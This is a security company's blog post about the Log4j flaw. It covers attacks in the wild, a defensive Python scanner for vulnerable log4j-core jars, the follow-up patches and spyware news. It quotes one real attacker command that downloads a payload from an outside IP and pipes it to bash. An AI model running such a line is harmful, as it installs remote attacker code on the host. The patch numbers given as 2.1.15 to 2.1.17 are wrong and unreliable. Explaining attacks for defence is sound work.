Logging around the Christmas week
Unless you have been attending too many Christmas lunches, dinners, drinks parties (like our fantastic ‘Friends Of Tiberium’ new office opening event), you will have seen the news that yet another piece of open source code running on Unix servers has been discovered to contain a critical bug which ‘could be trivially abused by miscreants to hijack servers and apps over the internet’.
The code in question is the open source logging utility for Java, Log4j, which is a logging tool that allows you to log at runtime without modifying the application binary. The log4j package is designed so that logging statements can remain in shipped code without incurring a heavy performance cost. Logging behaviour can be controlled by editing a configuration file, without touching the application binary.
The matter was raised by our very own CEO, Drew Perry, in a LinkedIn post the week before last. Very correctly, given the number of internet facing servers which run the package and the active attacks in the wild, he wrote:
“This one could get bad. Please have a search for Log4J library in use within your environment and determine if any services are exposed to the internet (if so, it will be hit hard with exploit attempts) then apply the following mitigations.”
Since that time, there have been a huge number of attacks coming from all the usual suspects from organised crime through to bedroom script kiddies, for the usual crypto mining, ransomware and associated nefarious activities.
A specific Base64-encoded example spotted and decoded by Tiberium Cyber Defender George Thoma is post-exploitation activity from a Russia-based server known to deploy crypto miners. They attempt to run the following command on exploited servers:
(curl -s 126.96.36.199:5874/188.8.131.52:80||wget -q -O- 184.108.40.206:5874/220.127.116.11:80)|bash
The initial Unix exploit has also been identified as a vector for the new Khonsari ransomware family, which targets Windows systems and appears to bypass antivirus.
The issue affects all versions of Log4j up to and including 2.14.1 and is obviously mitigated by identifying and patching affected servers, which in many cases is not an insignificant piece of work.
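One way to do the identification step, as an added example written for this post rather than Tiberium's own tooling: a small Python inventory script that walks a filesystem, opens every jar, war and ear it finds, reads the Maven metadata that official Apache log4j-core builds ship (an assumption; vendor-repackaged builds may strip it, so a miss is not proof of absence), recurses into jars nested inside wars and fat jars, and flags anything at or below 2.14.1, the range given above. The sample directory tree it builds is constructed purely for the demonstration, and the threshold is a parameter so it can be raised as later releases require.

```python
import io
import os
import re
import sys
import tempfile
import zipfile
from typing import Iterator, List, Optional, Tuple

# Maven metadata carried by official Apache log4j-core jars (assumption: vendor
# repackaged builds may strip or relocate it, so a miss is not proof of absence).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Only leading digits count."""
    parts: List[int] = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected(version: str, max_affected: str = "2.14.1") -> bool:
    """True if version <= max_affected (default: the range the post states)."""
    return parse_version(version) <= parse_version(max_affected)


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Read the log4j-core version from the jar's pom.properties, or None if absent."""
    try:
        raw = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in raw.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(zf: zipfile.ZipFile, label: str) -> Iterator[Tuple[str, str]]:
    """Yield (location, version) for log4j-core in this archive and in any
    archive nested inside it (wars, ears, fat jars), recursing as needed."""
    version = log4j_core_version(zf)
    if version:
        yield label, version
    for name in zf.namelist():
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except (zipfile.BadZipFile, KeyError):
                continue
            yield from scan_archive(inner, f"{label}!{name}")


def find_log4j(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (location, version) for every log4j-core found."""
    hits: List[Tuple[str, str]] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    hits.extend(scan_archive(zf, path))
            except zipfile.BadZipFile:
                continue  # suffix says archive, contents say otherwise
    return hits


def report(root: str, max_affected: str = "2.14.1") -> List[Tuple[str, str, bool]]:
    """(location, version, affected?) for each log4j-core found under root."""
    return [(loc, v, is_affected(v, max_affected)) for loc, v in find_log4j(root)]


def _jar_bytes(version: str) -> bytes:
    """Minimal constructed jar carrying only the Maven version metadata."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed sample, not a real deployment: a plain log4j-core jar at
    2.14.1, a war with a nested log4j-core at 2.16.0, and an unrelated jar."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    os.makedirs(os.path.join(root, "webapps"))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_jar_bytes("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "lib", "other-lib.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    with zipfile.ZipFile(os.path.join(root, "webapps", "shop.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _jar_bytes("2.16.0"))
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for loc, version, affected in report(target):
        print(f"{'AFFECTED' if affected else 'ok      '} log4j-core {version}  {loc}")
```

Run it with a directory argument (for example the application root or the whole filesystem) on a real host; with no argument it scans the constructed sample. Treat the output as an inventory to patch from, not a clean bill of health: log4j loaded from an exploded class directory, or a jar whose metadata has been stripped, will not be reported.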
A handy consolidated list of vendor advisories can be found here.
Clearly many of you will have already completed this work (in time for a nice relaxing Christmas break!), however you should be aware of two follow-on issues which are now doing the rounds, potentially requiring further patching. Obviously, when one (trivial to exploit) bug is found in a legacy package, the gold rush for more begins.
The original patch (2.1.15) did not fix another bug, resulting in another patch, yes, 2.1.16, which in turn did not address yet another issue, so the latest and safest release of Log4j is now 2.1.17.
Clearly World+Dog are now poring over the Log4j code looking for loopholes, so expect more activity and be prepared to keep patching.
If you are a Tiberium MYTHIC customer you will notice in your Teams channels that we have been hunting for exploit attempts, identifying vulnerable devices in your environment and applying remediation where possible, alongside expert advice.
At Tiberium, we are always available for advice or to show you the power of our platform including automation of remediation. Please contact us if you wish.
We have always been worried about the pace of development which uses open source libraries and components, particularly in a containerised environment which may connect to legacy internal systems and directly to the Internet, even with virtual firewalls and other filtering components in between. The potential for exploitation via bugs or misconfiguration must be a risk consideration for all businesses migrating to the new cloud-first paradigm.
This ‘TheNewStack’ piece pretty much sums up our view of the open source conundrum which will surely outlive most of us!
A recent theme developing appears to be the use of legislation and straightforward ‘banning’ by the United States Government and US based firms to reduce the impact of espionage by (it would seem) non US based entities and associated tooling manufacturers such as The NSO Group.
This week, Facebook banned ‘seven cyber mercenaries that it said carried out “indiscriminate” targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies’.
Following this, the US Government have been pressured by Democratic Senators to ‘punish Israel-based spyware maker NSO Group and three other surveillance software firms for enabling human rights abuses’ and effectively put them out of business.
This is a murky old world however and nothing is straightforward. It can only be a matter of time before a new John Le Carré appears with a CyberSpy character, perhaps just with the 🙂 emoji or the tag 5m1l3y.
Now about the song.
There are many Yule Log Christmas songs and videos. The cheesiest we could find is by John Legend.
Have a very Merry Christmas. Best wishes to you and your families from all of us at Tiberium.
Tune in next time for our review of the year and some premonitions for the year to come. It can’t be as bad as this year. We hope.